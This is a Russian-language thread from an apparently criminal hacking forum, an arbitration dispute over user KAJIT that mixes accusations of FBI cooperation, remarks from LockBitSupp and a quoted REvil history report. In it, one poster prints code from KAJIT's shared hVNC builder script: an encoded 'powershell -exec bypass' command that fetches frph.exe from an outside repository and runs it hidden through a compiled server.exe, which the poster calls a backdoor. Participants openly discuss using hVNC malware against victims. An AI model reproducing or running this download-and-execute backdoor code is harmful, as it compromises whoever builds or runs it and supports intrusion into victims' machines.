Арбитраж Претензии к KAJIT

Stallman · 29.01.2022

KAJIT сказал(а):

И решение админа я уже выкладывал.

Я подтверждаю, что после этого решения KAJIT связался со мной, и начал конкретные переговоры по передаче форума мне. Не могу сказать, что я был прямо рад этому, и сразу согласился, но решение админа я видел, и сложность ситуации понимал. Поэтому и взялся.

WillBeRich сказал(а):

Хочу публично извиниться перед severa Stallman если чем-то их задел. Впредь такого больше не повториться.
Желаю всем заработать много денег, и не тратить свое время на разборки в интернете или жизни, а посвятить время семье и близким.
Всем удачи!

Достойно, бро. Мне лично пофиг, я тебя и не заметил, если честно. А вот Северу задело, что ты каждый, до одного, его пост заминусовал, причем сразу после появления, как ждал его.
Он спрашивал про тебя, не знаю ли я, кто ты. Сказал мне, что ты походу чей-то клон. Может тебе эти извинения в его тему повесить? Так будет правильнее. Мне тут они не нужны совсем, тут серьезные дяди разговаривают. А старичку, там, в мемуарах, будет приятно, по любому.

captaincattani · 29.01.2022

goodvibes7 сказал(а):

Из-за чего пострадал Боря Ельцин ?

его киркоров сломал

Haunt · 29.01.2022

KAJIT сказал(а):

на машине в которой бежит скрипт баша который я выложил.

Сам напросился.
Смотрим сюда

https://xss.pro/threads/58221/post-384986

Это уже якобы обновленный, после моего замечания. hvnc(explain).zip
Смотрим строки в коде 101, 102.

Bash:

frph_exe='$f="c:\\Windows\\frph.exe";if (-not(Test-Path -Path $f -PathType Leaf)) {iwr -useb repo.x4k.dev/windows/frph.exe -out C:\\Windows\\frph.exe}'
cfrph_exe="powershell -exec bypass -enc $(echo $frph_exe | iconv -f UTF8 -t UTF16LE | base64 -w0)"

Ниче не изменилось, бекдор как был, так и остался. iwr == InvokeWebRequest, powershell скрипт идет на сервера x4k за frph.exe и кладет его по пути C:\\Windows\\frph.exe
Запомним этот момент. Что нас тут интересует - cfrph_exe баш переменная.
Смотрим дальше, строки в коде 112+:

Bash:

cat<<EOF>server.cpp
#include <stdio.h>
#include <windows.h>

int drop_revhvncconfig()
{
      CHAR filename[] = "C:\\\\Windows\\\\frph.ini";
      CHAR data[] = "$cdump";
      DWORD dwSize = $fsize;
      DWORD dwWritten = 0;
      HANDLE hFile = CreateFile(filename, GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
      if(hFile != INVALID_HANDLE_VALUE) {
    system("$cfrph_exe");
        WriteFile(hFile, data, dwSize, &dwWritten, NULL);
        CloseHandle(hFile);
      }
    Sleep(1000*1*1);
        return TRUE;
}
EOF

Смотрим на то, что с помощью баш скрипта, идет запись в server.cpp. Интересные моменты:
system("$cfrph_exe");
То есть, когда server.cpp будет в последствии скомпилен, и запущен, произойдет вызов powershell скрипта, который ранее был в cfrph_exe сформирован. Этот drop_revhvncconfig() отвечает за дроп frph.ini + пш скрипт, который выкачивает frph.exe из репозиториев x4k.

Смотрим дальше, что происходит в server.cpp:
Строка 147:

Bash:

nt __stdcall start_revhvnc()
{
        HANDLE hThread;
        WinExec("cmd /b /c start /min frph -c C:\\Windows\\frph.ini", SW_HIDE);
        return WaitForSingleObject(hThread, INFINITE);
}

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
        WinExec("powershell -exec bypass stop-process -name frph -force", SW_HIDE);
        Sleep(1000*1*1);

   drop_revhvncconfig();

        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)start_revhvnc,NULL, 0, NULL);
        Sleep(1000*1*1);
        
.................................... //etc

Что мы тут видим, функция start_revhvnc() через WinExec() стартует frph.exe
Но что более интересно, в WinMain, при каждом старте скомпиленного server.cpp происходит остановка предыдущего frph.exe и вызов drop_revhvncconfig()
То есть при каждом запуске, бинарь frph.exe обновляется из репозиториев x4k.
Далее создается поток с start_revhvnc(), то есть простыми словами запуск бинаря frph.exe
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)start_revhvnc,NULL, 0, NULL);

Казалось бы, при чем тут powershell и при чем тут линуксовый баш? Где же запуск бекдора происходит?
Дело в том, что это переделка TinyNuke, а он, как мы знаем, состоит из 2 компонент, клиента и сервера. Так вот server.cpp - в данном баш скрипте, это всего лишь заготовка, шаблон, который компилируется

i686-w64-mingw32-clang++ -O2 server.cpp -o server.exe -mwindows -lwininet -lurlmon -lws2_32 -lntdll -lshlwapi -lmsvcrt -static-libstdc++ -static-libgcc
На строке 2380 этого баш скрипта.
То есть этот баш скрипт попросту формирует сорц server.cpp (остальное не смотрел, но подозреваю что и клиент там же компилится) и далее компилит его в server.exe.
Это ваш hvnc сервер, если вы еще не поняли. После того, как hvnc сервер будет запущен на win сервере, произойдет загрузка и сработает твой POC, о котором ты просишь

KAJIT сказал(а):

сейчас это жеско захадкоженая подгрузка рандомного файл-а с именем frph.exe который не подается на исполнение, на машине в которой бежит скрипт баша который я выложил.

Таким образом, все верно, frph.exe не запускается в баш скрипте, он запускается уже в сбилженном server.exe, что так же является бекдором. И так же уебет юзера, только уже во время работы с hvnc сервером. Заебись пустил пыль в глаза.

CheckerChin · 29.01.2022

LockBitSupp сказал(а):

Например, потому что не сотрудничают с ФБР. Пруфы есть в арбитраже, который я надеюсь будет опубликован админом.

Ждем всем форумом, а то пока это всё выглядит не очень как-то. Обвинение и какой-то сраный скрин, который в фотожопе можно нарисовать.
Хотя мне кажется, что этот арбитраж ни к чему не приведет, админ же уже говорил, что он тут ничего не может поделать. А 100% пруфа нигде нет. Т.е есть шанс, что каджит не мусор. А невиновного юзера банить как-то не очень. Просто принять к сведению, что каджит может быть потенциально опасным. Но опять же, с чего верить тебе. Может ты из-за чего-то пытаешься устранить таким образом каджита))

Запасаемся попкорном, думаю еще пара страниц срача будет

KAJIT · 29.01.2022

Haunt сказал(а):

Это ваш hvnc сервер, если вы еще не поняли. После того, как hvnc сервер будет запущен на win сервере, произойдет загрузка и сработает твой POC, о котором ты просишь

Haunt сказал(а):

После того, как hvnc сервер будет запущен на win сервере

Haunt сказал(а):

на win сервере

все верно, ток ты забыл упомянуть о том где будет исполнен код-то.
То что было дропнуто во время сборки будет бежать не на тачке на которой происходила сборка, а на венде на которой он это запустит, ты развивай дальше - всем жуть как интересна. и спасибо за внимание

Haunt сказал(а):

И так же уебет юзера, только уже во время работы с hvnc сервером

во-во, тут по подробнее бро можно - а то ты самое важное упустил, и самое интересное >>> должно произойти RCE на линуксовой машины изза кода бегущего на тачке вендовой.
Дай жару - покажи народу как оно, а вы мотайте на ус че вам Haunt говорит, все так и есть - ему остается ток запилить атаку с вендовой тачки на линь, причем ему даже не надо ее искать в коде, так как на его строне аргумент - рандомный код бежит на атакуемой нубом венде - я даже и подумать не мог что кто может мне, все это так преподнести - потому просто болт положил на это и выложил все как есть. Снимаю шляпу, старина. Но пок до конца все покажи

Haunt · 29.01.2022

KAJIT сказал(а):

все верно, ток ты забыл упомянуть о том где будет исполнен код-то.

Я не забыл, я сказал что он будет запущен с под server.exe. Только вот разницы не могу уловить…какая разница, что твой бекдор пробьет, мой линукс сервер, где я это все соберу, или мой вин сервер, где это все будет запущено после сборки?)
Или бекдор уже не такой бекдористый, от того, что сработает на вин сервере, а не на линуксах, где баш соберёт это все?)))

KAJIT · 29.01.2022

Haunt сказал(а):

мой вин сервер, где это все будет запущено после сборки?)

в том что он не твой, например а терпилы >> которую ты хотел поиметь >> щас это важно, мэн ибо мне тут шлют -->> работу на Чк\ЦРУ\рептилойдов.
я еще раз повторяю - да это свинство вот так наплевательски относится к бедняжка скрипт-кидди. но это уже не важно.
Еще есть вопросы?

Haunt · 29.01.2022

KAJIT сказал(а):

в том что он не твой, например а терпилы

client.exe это клиент часть бота, которая и засылается терпиле, как ты выразился.
В этом можно убедиться, посмотрев выложенный сорц, начиная с 918 строки.
Там идут тиниковские методы со стартом Firefox, Chrome и логикой отрисовки их (функции PaintWindow).

server.exe обрабатывает hvnc коннекты - это твой сервер. Это именно то, что ты хостишь у себя. Я не ошибся.

Все мутки с frph.exe происходят в server.cpp, то есть в той части, которая принадлежит пользователю хвнц, а не терпиле.

KAJIT · 29.01.2022

Haunt сказал(а):

Все мутки с frph.exe происходят в server.cpp, то есть в той части, которая принадлежит пользователю хвнц, а не терпиле.

да, ты прав на все 100%.
Я не юзаю венду совсем, потому для меня тачка на венде - априори - тачка терпилы.
Вот так вот я наплевательски отнесся ко всем, кто сорцы не читает и плевать хотел, на то что они там тянут.
Расшарил все как есть.

За это я еще раз приношу свои извинения.
Всем читавшим будет - хорошим примером сей кейс.

VnaChwou7gIqnKaobhuBw12 · 29.01.2022

KAJIT сказал(а):

тачка на венде - априори - тачка терпилы.

пфффффф, кул хакир епать

Wolverine · 29.01.2022

KAJIT сказал(а):

мэн ибо мне тут шлют -->> работу на Чк\ЦРУ\рептилойдов.

Что, простите?

INC. · 29.01.2022

про вас уже пишут

The issue was the REvil operator disappeared in November 2021, shortly after their

conversation . LockBit believed another individual he referred to as “RED \ KAJIT” was to

blame . LockBit stated KAJIT was an administrator on another underground forum and

was working with the FBI . In November, administrators took the forum down for several

days before the REvil operator’s disappearance . If LockBit is correct, KAJIT may have

provided the FBI with information or possibly access to all its members and back-end

data, which is how the FBI could get to REvil and potentially other ransomware affiliates

тут https://analyst1.com/file-assets/History-of-REvil.pdf

Alpachino · 29.01.2022

INC. сказал(а):

про вас уже пишут

The issue was the REvil operator disappeared in November 2021, shortly after their

conversation . LockBit believed another individual he referred to as “RED \ KAJIT” was to

blame . LockBit stated KAJIT was an administrator on another underground forum and

was working with the FBI . In November, administrators took the forum down for several

days before the REvil operator’s disappearance . If LockBit is correct, KAJIT may have

provided the FBI with information or possibly access to all its members and back-end

data, which is how the FBI could get to REvil and potentially other ransomware affiliates

тут https://analyst1.com/file-assets/History-of-REvil.pdf

Уверенно и быстро набрал популярность на пике с крутыми склонами …

JuWangXi · 29.01.2022

INC. сказал(а):

про вас уже пишут

The issue was the REvil operator disappeared in November 2021, shortly after their

conversation . LockBit believed another individual he referred to as “RED \ KAJIT” was to

blame . LockBit stated KAJIT was an administrator on another underground forum and

was working with the FBI . In November, administrators took the forum down for several

days before the REvil operator’s disappearance . If LockBit is correct, KAJIT may have

provided the FBI with information or possibly access to all its members and back-end

data, which is how the FBI could get to REvil and potentially other ransomware affiliates

тут https://analyst1.com/file-assets/History-of-REvil.pdf

на хайповых движениях)

Snam · 29.01.2022

LockBitSupp сказал(а):

Например, потому что не сотрудничают с ФБР.

помнится "русь необъятная" также не сотрудничала.
Почему китай не "переобуется"?

Kelegen · 29.01.2022

Прошу прощения, что влезаю в столь глубокое болото. Но, у меня есть вопрос, которые интересовал еще с конца прошлого, бурного лета.
Для чего обычному кодеру, который пишет свои проекты, занимается обычным делом понадобились билды(в каких то моментах без панельки) скажем так от разных пп(уже на то время запрещенных) ? И сразу хотелось бы откинуть причину Анализа, этих же билдов.
Заранее благодарю за ответ

JuWangXi · 29.01.2022

Snam сказал(а):

помнится "русь необъятная" также не сотрудничала.
Почему китай не "переобуется"?

надеятся на китай, где стоят заводы джона из фром пендостана, это тоже самое, что выпить таблетку от поноса при геморрое) санкций накинут на вентилятор, и полетят самолеты с хакирами в юсу.

c0d3x · 29.01.2022

Snam сказал(а):

Почему китай не "переобуется"?

Китай давно переобут. Недавно обменяли двух канадцев на дочь основателя huawei. Ребятишек которые постоянно в СМИ гремят со своим рансомом тоже обменяют, деньги в таких политических игрищах не помогут.

linear · 29.01.2022

Kelegen сказал(а):

Прошу прощения, что влезаю в столь глубокое болото. Но, у меня есть вопрос, которые интересовал еще с конца прошлого, бурного лета.
Для чего обычному кодеру, который пишет свои проекты, занимается обычным делом понадобились билды(в каких то моментах без панельки) скажем так от разных пп(уже на то время запрещенных) ? И сразу хотелось бы откинуть причину Анализа, этих же билдов.
Заранее благодарю за ответ

если не реверс то модификация бинаря

KAJIT · 29.01.2022

Kelegen сказал(а):

Для чего обычному кодеру, который пишет свои проекты

конкретнее пиши

Арбитраж Претензии к KAJIT

(L1) cache

Комиссар Каттани

PWSH

(L2) cache

(L1) cache

PWSH

(L1) cache

PWSH

(L1) cache

OFF

(L2) cache

REVERSE SIDE OF THE MEDAL

RAID-массив

ripper

RAM

TOXIC

ripper

Мафиозник

RAID-массив

(L1) cache